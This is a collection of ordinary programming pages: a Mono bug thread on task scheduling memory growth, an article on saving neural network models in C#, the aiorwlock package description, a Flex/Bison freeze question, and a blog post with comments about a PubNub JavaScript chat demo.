I’m trying to work out what type of things may/may not be occurring that prevent the gc from recognizing the object is no longer in use. FromAsync returns a Task object which is obtained from TaskCompletionSource which has a class variable “source” that holds the value of the Task it in turn gets from the new Task invocation.
Here's the test case. It also includes a case using StartNew() where there is no explosion in memory use. The initial Test3Task below did not use the ContinueWith but to see if it was something we weren't cleaning up we put it in (to no effect). [And no, the listening variable used below is not used - there were plans to make the test more intelligent but a do forever was just as good.]
using System;
using System.Threading;
using System.Threading.Tasks;
namespace task_test
{
class MainClass
{
public static void Main (string[] args)
{
// Test3 - Leaky
var t = new Task3Test();
// Test4 - Doesn't leak
// var t = new Task4Test();
t.Run();
}
}
public class BaseTask
{
public int GetRandomInt(int top)
{
Random random = new Random();
return random.Next(1,top);
}
}
public class FibArgs
{
public byte[] data;
public int n;
}
public class Fib
{
public int Calculate(FibArgs args)
{
int n = args.n;
int a = 0;
int b = 1;
// In N steps compute Fibonacci sequence iteratively.
for (int i = 0; i < n; i++)
{
int temp = a;
a = b;
b = temp + b;
}
Console.WriteLine("ThreadId: {2}, fib({0}) = {1}", n, a, Thread.CurrentThread.GetHashCode());
return a;
}
}
public class Task3Test : BaseTask
{
public void Run()
{
bool listening = true;
long i = 0;
while (listening)
{
i++;
Func<int> fun = () => {
int n = GetRandomInt(100);
Fib f = new Fib();
FibArgs args = new FibArgs();
args.n = n;
return f.Calculate(args);
};
var t = Task<int>.Factory.FromAsync(fun.BeginInvoke, fun.EndInvoke, null);
t.ContinueWith( x => {
if (x.IsCompleted) {
x.Dispose();
x = null;
}
}
);
}
}
}
public class Task4Test : BaseTask
{
public void Run()
{
bool listening = true;
long i = 0;
while (listening)
{
int n = GetRandomInt(100);
Fib f = new Fib();
FibArgs args = new FibArgs();
args.n = n;
Task.Factory.StartNew(() => f.Calculate(args), TaskCreationOptions.LongRunning)
.ContinueWith(x => {
if(x.IsFaulted)
{
Console.WriteLine("OOPS, error!!!");
x.Exception.Handle(_ => true); //just an example, you'll want to handle properly
}
else if(x.IsCompleted)
{
Console.WriteLine("Cleaning up task {0}", x.Id);
x.Dispose();
}
}
);
}
}
}
}
These symptoms only seem to affect x86_64, as when I run on s390x I have no problems with Boehm or sgen. However, if I leave the WriteLine in the Calculate method I do see exponential memory consumption on s390x as well (the heapshot reports are very very different when running with and without that statement). Removal of that statement from x86_64 has no effect - it grows regardless.
The symptoms that the above test case exhibits are also experienced on an application that only creates a few tasks per second.
Jeremie, could you eyeball this?
Any info you can provide would be useful. I am asking Martin to look at this.
if (i > 1000000)
listening = false;
}
Thread.Sleep (2000);
while(true)
{
GC.Collect (10, GCCollectionMode.Forced);
Thread.Sleep (1000);
}
Thread.Sleep (-1);
Added this at the end of the while block in Test3. As I can see it consumes about 1.3 Gb and after a while releases it going back to 44MB RES. So there is no memory leak, runtime just can't keep up with the speed you are creating new tasks, so they stay scheduled forever.
The weird thing is that a single task consumes about 1MB RAM.
Oh, I've miscalculated. It's not 1MB per task, it's 1KB per task which is acceptable amount.
This is not a GC issue but a TaskScheduler issue.
Tasks can be created at a faster pace than they are completed.
I wrote a small program that can show us the problem:
Whereas .NET has rarely more than 3000 running tasks, Mono task count diverges.
It is worse when the tasks take more time to complete (eg: doing Console.WriteLine)
This is not a bug. The same behavior can be observed on .net.
The issue is that you're queueing tasks faster than the system can process them.
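The diagnosis above — tasks being queued faster than they complete — is easy to see in a language-neutral sketch (my own illustration, not the Mono scheduler):

```python
import collections

# Produce 3 work items per tick but consume only 1: the backlog grows
# linearly, which looks like a leak even though nothing is actually lost.
queue = collections.deque()
for tick in range(1000):
    for _ in range(3):
        queue.append(object())   # producer side (FromAsync in the report)
    if queue:
        queue.popleft()          # consumer side (the task scheduler)

print(len(queue))  # 2000 items still pending after 1000 ticks
```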
[Source: https://bugzilla.xamarin.com/12/12236/bug.html]
Neural Network Lab
Neural network models can be created, saved and reused. Here's how.
A neural network model consists of the network's architecture and defining numeric values. Did you know you can create, save and reuse a neural network model? I'll show you how in this month's column.
A network architecture is the number of input, hidden, and output nodes, and a description of how those nodes are connected. In most cases neural networks are fully connected so that all input nodes are connected to all hidden nodes, and all hidden nodes are connected to all output nodes.
The defining numeric values are the values of the weights and biases. Each input-to-hidden node connection and hidden-to-output node connection has an associated weight. Each hidden node and each output node has an associated bias. For a neural network with n input nodes, h hidden nodes, and o output nodes, there are (n * h) + h + (h * o) + o weights and biases. For example, the 3-4-2 neural network in Figure 1 has (3 * 4) + 4 + (4 * 2) + 2 = 26 weights and biases.
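The weight-and-bias count can be checked with a one-line helper (a sketch of the formula in the text, not code from the demo):

```python
def num_weights_and_biases(n, h, o):
    # Fully connected n-h-o network: input-to-hidden weights, hidden
    # biases, hidden-to-output weights, output biases.
    return (n * h) + h + (h * o) + o

print(num_weights_and_biases(3, 4, 2))  # 26, the 3-4-2 example
print(num_weights_and_biases(4, 5, 3))  # 43, the demo network
```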
The behavior of a neural network is also defined by two activation functions. For neural network classifiers, where the goal is to predict a discrete value (for example, predicting the political party affiliation of a person), the softmax activation function is almost always used on the output nodes. The most common activation function for hidden nodes is the hyperbolic tangent (tanh) function, but the logistic sigmoid function is sometimes used.
Working with neural networks usually involves trial and error. The number of hidden nodes is a free parameter (sometimes called a hyper parameter), and the parameters used during training to find good values for the weights and biases are also free parameters. For the most common form of training, back-propagation, training parameters usually include the learning rate (how much weights and biases change during each training iteration), the momentum rate (an optional value that both increases training speed and can prevent training from getting stuck at poor values for the weights and biases) and, optionally, a weight decay rate (to prevent over-fitting).
The best way to see where this article is headed is to examine the screenshot of a demo program shown in Figure 2. The goal of the demo program is to predict the species of an iris flower (Iris setosa or Iris versicolor or Iris virginica) using the flower's sepal (a leaf-like structure) length and width, and petal length and width.
The demo data is part of a famous data set called Fisher's Iris Data. The full data set has three species and there are 50 examples of each species so the demo has a total of 150 data items. The raw data was preprocessed by using 1-of-N encoding where setosa is (1, 0, 0), versicolor is (0, 1, 0) and virginica is (0, 0, 1).
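The 1-of-N encoding described above can be sketched as follows (illustration only; the demo's data was preprocessed ahead of time):

```python
SPECIES = ["setosa", "versicolor", "virginica"]

def one_hot(label):
    # 1-of-N encoding: a 1 in the position of the matching class.
    return [1 if s == label else 0 for s in SPECIES]

print(one_hot("setosa"))      # [1, 0, 0]
print(one_hot("versicolor"))  # [0, 1, 0]
```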
The four numeric predictor variables, sepal length and width, and petal length and width, were not normalized because the values all have roughly the same magnitude and so no one predictor will dominate the others.
The source data was randomly split into a training set and a test set. The training set has 80 percent of the items (120) and the test set has the remaining 20 percent of the items (30).
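A seeded random 80/20 split like the one the demo performs can be sketched in a few lines. The demo's SplitData is C#; this Python version just mirrors the idea, and its names are ours:

```python
import random

def split_data(all_data, train_pct, seed):
    # Shuffle indices with a fixed seed so the split is reproducible.
    rnd = random.Random(seed)
    indices = list(range(len(all_data)))
    rnd.shuffle(indices)
    cut = int(train_pct * len(all_data))
    train = [all_data[i] for i in indices[:cut]]
    test = [all_data[i] for i in indices[cut:]]
    return train, test

rows = [[float(i)] for i in range(150)]  # stand-in for the 150 iris items
train, test = split_data(rows, 0.80, seed=1)
print(len(train), len(test))  # 120 30
```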
The demo creates a 4-5-3 neural network. There are four input nodes, one for each predictor variable. The number of hidden nodes, five, was determined using trial and error. There are three output nodes because there are three possible classes to predict.
The demo program uses the back-propagation algorithm to find the values of the weights and biases so that the computed output values (using training data input values) closely match the known correct output values in the training data. After training, the values of the 43 weights and biases are displayed, and the accuracy of the model is calculated and displayed. The model correctly predicts 97.5 percent of the training items (117 out of 120) and 96.7 percent of the test items (29 out of 30).
The demo then saves the information that defines the neural network in a text file named iris_model_001.txt. The demo creates a new, empty neural network, and loads the saved model into the new network. The accuracy of the new neural network on the test data is 96.7 percent as it should be, because the two neural networks are the same.
This article assumes you have at least intermediate-level developer skills and a basic understanding of neural networks. The demo program is too long to present in its entirety here, but complete source code is available in the download that accompanies this article. All normal error checking has been removed to keep the main ideas of neural network models as clear as possible.
The Demo Program
To create the demo program I launched Visual Studio and selected the C# console application project template. I named the project NeuralModels. The demo has no significant Microsoft .NET Framework dependencies so any version of Visual Studio will work.
After the template code loaded, in the Solution Explorer window I right-clicked on file Program.cs and renamed it to the more descriptive NeuralModelsProgram.cs and then allowed Visual Studio to automatically rename class Program. At the top of the template-generated code in the Editor window, I deleted all unnecessary using statements, leaving just the reference to the top-level System namespace. Then I added a using statement for the System.IO namespace so that methods to read from and write to text files could be accessed easily.
The overall structure of the demo program is shown in Listing 1. Helper method LoadData reads the source iris data from a text file and stores it into an array-of-arrays-style matrix. Method SplitData creates a reference copy of the source data and splits it into a training set and a test set. All of the neural network logic is contained in a program-defined class called NeuralNetwork.
using System;
using System.IO;
namespace NeuralModels
{
class NeuralModelsProgram
{
static void Main(string[] args)
{
// All program control statements
}
static double[][] LoadData(string dataFile,
int numRows, int numCols) { . . }
static void SplitData(double[][] allData,
double trainPct, int seed,
out double[][] trainData,
out double[][] testData) { . . }
public static void ShowMatrix(double[][] matrix,
int numRows, int decimals,
bool indices) { . . }
public static void ShowVector(double[] vector,
int decimals, int lineLen,
bool newLine) { . . }
}
public class NeuralNetwork { . . }
} // ns
The Main method loads and displays the source data with these statements:
double[][] allData =
LoadData("..\\..\\IrisData.txt", 150, 7); // 150 rows, 7 cols
ShowMatrix(allData, 4, 1, true); // 4 items, 1 decimal
You can easily find the raw iris data set in several places on the Internet, and then encode the species values using a text editor replace command. The source data is split into training and test sets, like so:
double[][] trainData = null;
double[][] testData = null;
double trainPct = 0.80;
int splitSeed = 1;
SplitData(allData, trainPct, splitSeed,
out trainData, out testData);
The choice of the seed value (1) for the random number generator was arbitrary. The neural network is created with these statements:
int numInput = 4;
int numHidden = 5;
int numOutput = 3;
NeuralNetwork nn =
new NeuralNetwork(numInput, numHidden, numOutput);
The neural network is fully connected, and the tanh hidden node activation function is hardcoded. A big advantage of writing custom neural network code is that you can keep the size of your source code much smaller than when writing code intended to be used by people who do not have access to the source code. The neural network is trained with these statements:
int maxEpochs = 1000;
double learnRate = 0.05;
double momentum = 0.01;
bool progress = true;
double[] wts = nn.Train(trainData, maxEpochs,
learnRate, momentum, progress);
The accuracy of the neural network is then calculated:
double trainAcc = nn.Accuracy(trainData);
double testAcc = nn.Accuracy(testData);
At this point the program could be closed, losing the values of the weights and biases. This isn't a problem because the neural network could be easily recreated and retrained. But in more complex situations where training can take hours or even days, you'd want to save your model. The demo model is saved with these statements:
string modelName = "..\\..\\iris_model_001.txt";
nn.SaveModel(modelName);
Here the model is saved as a text file. With the rise of more sophisticated data formats such as XML, OData, and JSON, it's easy to forget that ordinary text files are often simple and effective. The contents of the resulting model text file are:
numInput:4
numHidden:5
numOutput:3
weights:-1.4442,-1.3859,-0.2061,(etc),-0.5112
The weights and bias values are stored together. The first 4 * 5 = 20 values are for the input-to-hidden weights matrix, in row major form (left to right, top to bottom). The next five values are the hidden node biases. Next come 5 * 3 = 15 values for the hidden-to-output weights matrix. And then the last three values are the output node biases.
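Decoding that flat vector back into the four structures follows directly from the ordering just described. This is an illustrative Python sketch for the 4-5-3 demo network (the article does this in C# via SetWeights; the function and variable names here are ours):

```python
# Unflatten the saved "weights:" vector into ih weights (row major),
# hidden biases, ho weights (row major), and output biases, in that order.
def unflatten(wts, n_input, n_hidden, n_output):
    k = 0
    ih_weights = [wts[k + i * n_hidden : k + (i + 1) * n_hidden]
                  for i in range(n_input)]
    k += n_input * n_hidden
    h_biases = wts[k : k + n_hidden]
    k += n_hidden
    ho_weights = [wts[k + i * n_output : k + (i + 1) * n_output]
                  for i in range(n_hidden)]
    k += n_hidden * n_output
    o_biases = wts[k : k + n_output]
    return ih_weights, h_biases, ho_weights, o_biases

wts = list(range(43))  # stand-in values; a real model file holds 43 doubles
ih, hb, ho, ob = unflatten(wts, 4, 5, 3)
print(len(ih), len(ih[0]))  # 4 5
print(hb)                   # [20, 21, 22, 23, 24]
print(ob)                   # [40, 41, 42]
```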
A new neural network is created and the saved model is loaded with these statements:
NeuralNetwork nm = new NeuralNetwork();
nm.LoadModel(modelName);
double modelAcc = nm.Accuracy(testData);
The new neural network, named nm, has data members for the number of input nodes, the input-to-hidden node weights, and so on, but none of these data members are initialized. The LoadModel method takes the information from the trained network and uses it to initialize the network.
What Defines a Model?
Exactly what constitutes a neural network model is probably best understood by looking at code. The definition for class method SaveModel is presented in Listing 2.
public void SaveModel(string modelName)
{
FileStream ofs = new FileStream(modelName,
FileMode.Create);
StreamWriter sw = new StreamWriter(ofs);
sw.WriteLine("numInput:" + this.numInput);
sw.WriteLine("numHidden:" + this.numHidden);
sw.WriteLine("numOutput:" + this.numOutput);
sw.Write("weights:");
for (int i = 0; i < ihWeights.Length; ++i)
for (int j = 0; j < ihWeights[0].Length; ++j)
sw.Write(ihWeights[i][j].ToString("F4") + ",");
for (int i = 0; i < hBiases.Length; ++i)
sw.Write(hBiases[i].ToString("F4") + ",");
for (int i = 0; i < hoWeights.Length; ++i)
for (int j = 0; j < hoWeights[0].Length; ++j)
sw.Write(hoWeights[i][j].ToString("F4") + ",");
for (int i = 0; i < oBiases.Length - 1; ++i)
sw.Write(oBiases[i].ToString("F4") + ",");
sw.WriteLine(oBiases[oBiases.Length-1].ToString("F4"));
sw.Close();
ofs.Close();
}
Method SaveModel essentially creates a configuration file. The number of input, hidden and output nodes are written, one to a line, with a leading identifier. The weights and biases are written sequentially, to four decimal places, with a comma character as a delimiter. This is about as simple a format as possible and is feasible because the code is intended for someone who has the ability to access and modify the source code.
The definition for class method LoadModel is presented in Listing 3. The method opens the model file without doing any error checking. When writing code for personal use, it's often a tough call whether to include error-checking code, which can easily double the number of lines, or to leave it out. Of course, in a production environment you must include error checking.
public void LoadModel(string modelName)
{
FileStream ifs = new FileStream(modelName,
FileMode.Open);
StreamReader sr = new StreamReader(ifs);
int numInput = 0;
int numHidden = 0;
int numOutput = 0;
double[] wts = null;
string line = "";
string[] tokens = null;
while ((line = sr.ReadLine()) != null)
{
if (line.StartsWith("//") == true) continue;
tokens = line.Split(':');
if (tokens[0] == "numInput")
numInput = int.Parse(tokens[1]);
else if (tokens[0] == "numHidden")
numHidden = int.Parse(tokens[1]);
else if (tokens[0] == "numOutput")
numOutput = int.Parse(tokens[1]);
else if (tokens[0] == "weights")
{
string[] vals = tokens[1].Split(',');
wts = new double[vals.Length];
for (int i = 0; i < wts.Length; ++i)
wts[i] = double.Parse(vals[i]);
}
}
sr.Close();
  ifs.Close();
this.rnd = new Random(4); // Same as ctor
this.SetWeights(wts);
}
Notice method LoadModel is coded to allow you to insert C#-style comment lines. In most cases you'd want to add information such as the training parameter values, location of the training data and so on.
After reading the saved values from the model text file, method LoadModel uses the values to allocate space for the arrays that hold the weights and bias values, and then assigns values for numInput, numHidden, numOutput, and the weights and biases.
The seed value for the Random object, 4, is the same as used in the primary constructor method. This is a brittle design and a more robust alternative is to parameterize the primary constructor to accept a seed value, and modify methods SaveModel and LoadModel so that the constructor seed value is saved and loaded just as the other model parameters.
Wrapping Up
Saving and retrieving a custom neural network model isn't too difficult from a technical point of view. The more difficult aspect of neural network models is defining exactly what constitutes your model and designing a good calling interface. Based on my experience at least, there are very few useful general guidelines other than the saying attributed to Albert Einstein, "Everything should be as simple as possible, but not simpler."
The software theme of this article is that when you're writing code intended to be used by yourself, or possibly a colleague, you can make your code much simpler than when you're writing code intended for an external audience of some sort. For example, the demo program presented in this article used a hardcoded hyperbolic tangent function as the hidden node activation function. This permits the model design to leave out the choice of activation function. This is fine because as long as you have access to the source code, you can easily change the activation function. But if you were writing neural network code as a general library, you'd have to include every imaginable activation function, which in turn would complicate any model.
https://visualstudiomagazine.com/articles/2015/09/01/how-to-reuse-neural-network-models.aspx
Read write lock for asyncio.
An RWLock maintains a pair of associated locks, one for read-only operations and one for writing. The read lock may be held simultaneously by multiple reader tasks, so long as there are no writers. The write lock is exclusive.
Whether or not a read-write lock will improve performance over the use of a mutual exclusion lock depends on the frequency that the data is read compared to being modified. For example, a collection that is initially populated with data and thereafter infrequently modified, while being frequently searched is an ideal candidate for the use of a read-write lock. However, if updates become frequent then the data spends most of its time being exclusively locked and there is little, if any increase in concurrency.
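The semantics described here, many concurrent readers, one exclusive writer, can be illustrated with only the standard library. The following is a stripped-down sketch, not aiorwlock's actual implementation (the class and names are ours):

```python
import asyncio

class SimpleRWLock:
    # Illustration only: readers share; a writer waits for readers to drain
    # and then holds the condition's underlying lock exclusively.
    def __init__(self):
        self._readers = 0
        self._cond = asyncio.Condition()

    async def acquire_read(self):
        async with self._cond:
            self._readers += 1

    async def release_read(self):
        async with self._cond:
            self._readers -= 1
            if self._readers == 0:
                self._cond.notify_all()

    async def acquire_write(self):
        # Hold the condition's lock for the whole write: new readers block
        # on it, and we wait until existing readers have finished.
        await self._cond.acquire()
        while self._readers:
            await self._cond.wait()

    def release_write(self):
        self._cond.release()

async def demo():
    lock = SimpleRWLock()
    active = peak = 0

    async def reader():
        nonlocal active, peak
        await lock.acquire_read()
        active += 1
        peak = max(peak, active)   # record how many readers overlap
        await asyncio.sleep(0.01)
        active -= 1
        await lock.release_read()

    await asyncio.gather(reader(), reader(), reader())
    return peak

print(asyncio.run(demo()))  # 3 -- all three readers held the lock at once
```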
The implementation is an almost direct port of this patch.
Requires Python 3.5+
import asyncio
import aiorwlock

loop = asyncio.get_event_loop()

async def go():
    rwlock = aiorwlock.RWLock(loop=loop)
    async with rwlock.writer:
        # or same way you can acquire reader lock
        # async with rwlock.reader: pass
        print("inside writer")
        await asyncio.sleep(0.1, loop=loop)

loop.run_until_complete(go())
Requires Python 3.3+
import asyncio
import aiorwlock

loop = asyncio.get_event_loop()

@asyncio.coroutine
def go():
    rwlock = aiorwlock.RWLock(loop=loop)
    with (yield from rwlock.writer):
        # or same way you can acquire reader lock
        # with (yield from rwlock.reader): pass
        print("inside writer")
        yield from asyncio.sleep(0.1, loop=loop)

loop.run_until_complete(go())
By default, RWLock switches context on lock acquisition. That allows other waiting tasks to acquire the lock even if the task holding it contains no context switches (await fut statements).

The default behavior can be switched off with the fast argument: RWLock(fast=True).

Long story short: the lock is safe by default, but if you are sure you have context switches (await, async with, async for or yield from statements) inside the locked code, you may want to use fast=True for a minor speedup.
aiorwlock is offered under the Apache 2 license.
https://pypi.org/project/aiorwlock/
Hello all,
I've been trying to build a compiler for learning purposes. I'm creating the lexer with GNU Flex and a parser with Bison. I've been using these tools on Linux, but my main development platform is Windows (Visual Studio). Last week I ran into a problem: when I run the parser, the application freezes. If I pause the application (using VS's debugger pause), it always stops at the same location in the C library.
The callstack:
The line of code at which the application pauses:
else if ( !ReadFile( (HANDLE)_osfhnd(fh), buffer, cnt, (LPDWORD)&os_read, NULL ) || os_read < 0 || (size_t)os_read > cnt)
I validated that the stream is valid and is the correct file.
I'm using the gnuwin32 version of flex on windows to generate the lexer.
I've reduced the flex file to:
%{
#include <iostream>
using namespace std;
#include "muse.tab.h"
#define YY_DECL extern "C" int yylex()
%}

%option yylineno

%%
.*  { std::cout << "hello"; return T_USING; }
;
%%
Is there anyone who has encountered this issue before?
http://www.gamedev.net/topic/642237-windows-flexbison-parser-freeze/
Sending Client-To-Client Realtime Messages With The PubNub JavaScript Library
Last night, I finally got around to playing with the PubNub JavaScript library. PubNub provides an API for "push" communication that can broadcast textual messages to a wide range of devices including desktop, TV, and mobile. And, unlike some other realtime messaging libraries, PubNub allows clients to communicate directly with each other using nothing more than the PubNub API. The PubNub website appears to have a tremendous amount of information on it (and is, quite frankly, a bit overwhelming); as such, I'm quite sure that my understanding of the service only scratches the surface. With just a little bit of JavaScript, however, I was able to get this demo up and running quite quickly. And, without having to set up any ColdFusion or Node.js servers, the barrier to entry is incredibly low.
NOTE: In the title to this post, the term "client-to-client" is not meant literally; not as in peer-to-peer. I simply meant that the service does not require you to provide an additional server-side entity in order for the publish and subscribe feature to work.
With PubNub, your server-side application needs to be involved only as much as is necessary - the clients can push messages directly to each other. Your server-side application also has the ability to push messages to the clients. And, depending on the type of server you are running, your server-side application can either subscribe to the PubSub API; or, it can request a message history using a more traditional request/response lifecycle.
Ok, so that's about as deeply as I understand the PubNub service at this point (which is not even as much information as they have on their FAQ page). But, in about an hour or so, I was able to get a client-to-client demo working, complete with iPhone functionality:
<!DOCTYPE html>
<html>
<head>
	<title>Using PubNub For Publish And Subscribe Communication</title>

	<!-- Mobile viewport configuration. -->
	<meta name="viewport" content="width=device-width, user-scalable=no" />

	<!-- Chat styles. -->
	<link rel="stylesheet" type="text/css" href="./styles.css" />

	<!-- jQuery. -->
	<script type="text/javascript" src="./jquery-1.6.1.min.js"></script>
</head>
<body>

	<!-- This is simple CHAT - what can I say, it's realtime. -->
	<div class="messageLog">
		<ul>
			<!-- This will be populated dynamically. -->
		</ul>
	</div>

	<form>
		<input type="text" name="message" size="" />
		<button type="submit" disabled="disabled">Send</button>
	</form>

	<!-- --------------------------------------------------- -->
	<!-- --------------------------------------------------- -->

	<!-- PubNub configuration details. -->
	<div id="pubnub" pub- </div>

	<!--
		Include PubNub from THEIR content delivery network. In the
		documentation, they recommend this as the only way to build
		things appropriately; it allows them to continually update
		the security features.

		NOTE: The PubNub script MUST BE included AFTER the above DIV
		tag that provides the configuration keys.
	-->
	<script type="text/javascript" src=""></script>
	<script type="text/javascript">

		// This is the user object. Each user has a unique ID that
		// allows it to be differentiated from all other clients on
		// the same subscribed channel.
		var user = {
			uuid: null,
			subscribed: false
		};

		// Cache frequent DOM references.
		dom = {};
		dom.messageLog = $( "div.messageLog" );
		dom.messageLogItems = dom.messageLog.find( "> ul" );
		dom.form = $( "form" );
		dom.formInput = dom.form.find( "input" );
		dom.formSubmit = dom.form.find( "button" );

		// Override form submit to PUSH message.
		dom.form.submit(
			function( event ){

				// Cancel the default event.
				event.preventDefault();

				// Make sure there is a message to send and that the
				// user is subscribed.
				if ( !user.subscribed || !dom.formInput.val().length ){

					// Nothing more we can do with this request.
					return;

				}

				// Send the message to the current channel.
				sendMessage( dom.formInput.val() );

				// Clear and focus the current message so the
				// user can keep typing new messages.
				dom.formInput
					.val( "" )
					.focus()
				;

			}
		);

		// I append the given message to the message log.
		function appendMessage( message, isFromMe ){

			// Create the message item.
			var messageItem = $( "<li />" ).text( message );

			// If the message is from me (ie. the local user) then
			// add the appropriate class for visual distinction.
			if (isFromMe){
				messageItem.addClass( "mine" );
			}

			// Add the message element to the list.
			dom.messageLogItems.append( messageItem );

		}

		// I send the given message to all subscribed clients.
		function sendMessage( message ){

			// Immediately add the message to the UI so the user
			// feels like the interface is super responsive.
			appendMessage( message, true );

			// Push the message to PubNub. Attach the user UUID as
			// part of the message so we can filter it out when it
			// gets echoed back (as part of our subscription).
			PUBNUB.publish({
				channel: "hello_world",
				message: {
					uuid: user.uuid,
					message: message
				}
			});

		};

		// I receive the message on the current channel.
		function receiveMessage( message ){

			// Check to make sure the message is not just being
			// echoed back.
			if (message.uuid === user.uuid){

				// This message has already been handled locally.
				return;

			}

			// Add the message to the chat log.
			appendMessage( message.message );

		}

		// -------------------------------------------------- //
		// -------------------------------------------------- //

		// In order to initialize the system, we have to wait for the
		// client to receive a UUID and for the subscription to the
		// PubNub server to be established.
		var init = $.when(

			// Get the user ID.
			getUUID(),

			// Subscribe to the PubNub channel.
			$.Deferred(
				function( deferred ){

					// When the PubNub connection has been
					// established, resolve the deferred container.
					PUBNUB.subscribe({
						channel: "hello_world",
						callback: receiveMessage,
						connect: deferred.resolve,
						error: deferred.fail
					});

				}
			)

		);

		// When the UUID has come back, prepare the user for use
		// within the system.
		init.done(
			function( uuid ){

				// Store the UUID with the user.
				user.uuid = uuid;

				// Flag the user as subscribed.
				user.subscribed = true;

				// Enable the message form.
				dom.formSubmit.removeAttr( "disabled" );

			}
		);

		// -------------------------------------------------- //
		// -------------------------------------------------- //

		// NOTE: The following are just PubNub utility methods that
		// have been converted from callback-based responses to
		// deferred-based promises.

		// I get a UUID from the PUBNUB server. I return a promise
		// of the value to be returned.
		function getUUID(){

			// Since the core UUID method uses a callback, we need to
			// create our own intermediary deferred object to wire
			// the two workflows together.
			var deferred = $.Deferred();

			// Ask PubNub for a UUID.
			PUBNUB.uuid(
				function( uuid ){

					// Resolve the uuid promise.
					deferred.resolve( uuid );

				}
			);

			// Return the UUID promise.
			return( deferred.promise() );

		}

	</script>
</body>
</html>
As with all things "realtime," the first demo anyone wants to try out is a chat application. And, since PubNub provides an API that allows for both publish and subscribe functionality to be executed on the client, the above code is the only thing powering this demo.
I tried to write the code in a top-down manner; I'm using jQuery's Deferred objects and management to ensure that the user is fully subscribed and assigned a PubNub-provided UUID before they are allowed to send messages. Then, messages are added to the chat log as they are both sent out (for perceived performance) and received to and from the PubNub API respectively.
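The echo-filtering idea, every published message carries the sender's UUID, and each client ignores its own echoes, can be shown without PubNub at all. Here is a plain-JavaScript sketch with an in-memory stand-in for the channel; createChannel and createClient are hypothetical names of ours, and nothing below is the actual PubNub API:

```javascript
// In-memory stand-in for a pub/sub channel.
function createChannel() {
    var subscribers = [];
    return {
        subscribe: function (callback) { subscribers.push(callback); },
        publish: function (message) {
            // A real service echoes messages back to the sender too.
            subscribers.forEach(function (cb) { cb(message); });
        }
    };
}

// A chat client that renders its own messages immediately and drops echoes.
function createClient(uuid, channel) {
    var log = [];
    channel.subscribe(function (message) {
        if (message.uuid === uuid) {
            return; // Echo of our own message -- already rendered locally.
        }
        log.push(message.message);
    });
    return {
        send: function (text) {
            log.push(text); // Perceived performance: render immediately.
            channel.publish({ uuid: uuid, message: text });
        },
        log: log
    };
}

var channel = createChannel();
var alice = createClient("uuid-a", channel);
var bob = createClient("uuid-b", channel);

alice.send("Hello from Alice");
bob.send("Hi Alice!");

console.log(alice.log); // [ 'Hello from Alice', 'Hi Alice!' ]
console.log(bob.log);   // [ 'Hello from Alice', 'Hi Alice!' ]
```

Without the UUID check, each sender would see its own message twice: once rendered locally, and once when the service echoed it back.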
Once I got the code working, I tried to create some bi-directional communication between my Mac and my iPhone. And, much to my delight it worked perfectly and with better performance than I would have anticipated. Even when I was using the 3G network, the latency on the iPhone was entirely acceptable.
Here's what the conversation looked like on my Mac:
... and here's what the other side of the conversation looked like on my iPhone:
One thing that was especially interesting on the iPhone was that the messages appeared to sync up even after the mobile Safari browser was no longer in use. So, if I put the phone to sleep or if I exited the browser in order to use another application, any back-logged messages appeared to sync to the phone once the browser was re-focused. Pretty cool!
Overall, the PubNub service and JavaScript library appear to be quite promising. The thing that I found most frustrating about putting this together was the PubNub website. It's just a tad bit overwhelming. There's a huge number of links and demos; but, at the same time, there doesn't appear to be any consolidated documentation. For example, what's with that "pubnub" DIV in my demo? Honestly, I have no idea - that's just how one of their tutorials worked. Even the pricing is unclear. It seems that there is a certain amount of free broadcasting that one can perform (which is awesome for developers looking to dive in); but, I wasn't sure how to quantify it, nor did I really see how my credits related to my demo activity.
That said, the PubNub website definitely leaves you with the feeling that this realtime platform is no joke. It looks like they've put a tremendous amount of effort into putting it together and I'm looking forward to playing with it some more.
Want to use code from this post? Check out the license.
Reader Comments
What is your code for the "styles.css" page and the "jquery-1.6.1.min.js" page in your example?
@Allan,
Just some styling for the markup. And the other is the latest jQuery library (). The CSS was pretty minimal, so I didn't bother posting it. The demo would work just the same with or without it (just not as pretty).
Important Update:
In my demo, I am including the "config" DIV tag after the Script tag that created the PUBNUB namespace. As such, the demo is actually running in the "demo" mode. In order for the keys to be used in the configuration, you actually have to include the Script tag from the CDN after the DIV tag.
I have updated the demo code to put the config DIV before the Script tag.
Ben
Here is your code embed as html5 page.
Chat Page:
=====================================================================
well view source to get the code then - the embed code
======================================================================
The chat folder contents:
benNadel.html
jquery-1.6.1.min.js
Server i am on is running PHP5.5 Meaning:
alhanson.com (the .com part) is in RAM
running on the Server.
Allan
Update: I have gotten the <embed> to work loading an html page into Windows IE 9 and Opera. To get Ben's page to work in my sandbox "alhanson.com" (the chat), you will have to call a friend on the phone or something, and have them log in to chat. I have chatted with Hadrian from Caledonia, located somewhere between Australia and New Zealand. You have to enter a lot of "testing text" and hit enter to push the text box down the page to get the scroll bar to pop out, and you can see Ben's embedded page appear with your text scrolling up under my page. Because we embed an html document, we have also embedded the http protocol along with it. So if Ben had his page published as an html document somewhere else on the WWW, I could link to it through the embed tag with a full address. This fundamentally changes everything.
Basically html5 is a lot of nav bar links; section, article, and aside containers to embed powerful scripts behind. It is a layer of simple html formatted with a cascading style sheet run on a layer of powerful scripts, which seems to have a truly organic nature and evolving life of it own on the web.
Of course the next task is to be able to pass text from the simple html layer "the html5 page" to the embed html5 page with the script on it.
@Allan,
I just looked at the source of that page -- I'm still shocked that the Embed tag works with an HTML page. That's just the craziest thing I've ever seen :D I really like the idea and it sounds like you're making some progress in where you can get it to work.
HTML5, in general, has some really cool stuff. I need to take some time to wrap my head around all the semantic tags. I get them from a philosophical standpoint; but, I just need to figure out how to organize them practically.
@All,
Also, it should be noted that pub/sub keys on the DIV can actually be placed right on the Script tag as well (so long as it as the id="pubnub" on it). This way, the same tag that includes the PubNub namespace can also define the keys.
Ben,
I have taken things on step farther. On my site a have a folder called "chat" with your html page in it benNadel.html, pubnub-3.1.min.js, jquery-1.6.1.min.js, and the chat.manifest. The chat.manifest the links pubnub-3.1.min.js, jquery-1.6.1.min.js to be cached on the two client's computers that have benNadel.html open. The link on your page links to pubnub-3.1.min.js on my site now. Seems to be working! I will attach the chat folder in am email and send it to you.
al
@Allan,
It's interesting - when I go to your chat page in Chrome, it actually says "Plug-in Missing".
Hello Ben,
I put your code in my php server and while I open it, it only have a disable send button. Could you please kindly provide more detail tutorial page for us?
Many Thanks,
Henry
"It's interesting - when I go to your chat page in Chrome, it actually says "Plug-in Missing". "
